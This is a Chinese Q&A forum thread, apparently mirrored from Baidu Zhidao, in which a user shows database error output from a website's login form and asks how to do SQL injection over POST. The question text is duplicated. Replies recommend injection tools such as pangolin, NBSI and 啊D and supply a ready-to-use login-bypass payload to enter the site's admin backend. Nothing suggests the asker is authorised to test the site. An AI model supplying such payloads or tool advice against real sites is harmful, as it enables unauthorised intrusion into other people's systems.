UC知道sql注入,post 注入问题
来源:百度知道 编辑:UC知道 时间:2024/06/07 02:01:57
测试了一站点,登录框中用户名输入一个‘ 就变成了这样
Microsoft JET Database Engine 错误 '80040e14'
查询值的数目与目标字段中的数目不同。
/add.asp,行 33
请问该怎么注入? 他就一个口啊,post的 网站的教的都是Get。。。
用户名中输入一个 dd'就变成了这样
Microsoft JET Database Engine 错误 '80040e14'
语法错误 (操作符丢失) 在查询表达式 'q='dd'' and w='1' and e='' and e2='' and r='' and t='' and y='' and u='' and i='' and o='' and p=''' 中。
/add.asp,行 31
Microsoft JET Database Engine 错误 '80040e14'
查询值的数目与目标字段中的数目不同。
/add.asp,行 33
请问该怎么注入? 他就一个口啊,post的 网站的教的都是Get。。。
用户名中输入一个 dd'就变成了这样
Microsoft JET Database Engine 错误 '80040e14'
语法错误 (操作符丢失) 在查询表达式 'q='dd'' and w='1' and e='' and e2='' and r='' and t='' and y='' and u='' and i='' and o='' and p=''' 中。
/add.asp,行 31
用pangolin或者NBSI都能post的,或者下个注入中专生成器,都可以的。
对于POST的注入方式。啊D是不行的。啊D针对的是GET方式的注入检测。
看你的错误表示。如果这是登录框的话,是后台登录框,那么是可以成功进入的。
你用户名填 fjhh' or 'fjhh'='fjhh' or 'fjhh'='fjhh
密码随便。
over
如有疑问,一起探讨。我也正在学习的菜鸟。
去网上下载一个“阿D注入工具”很好用的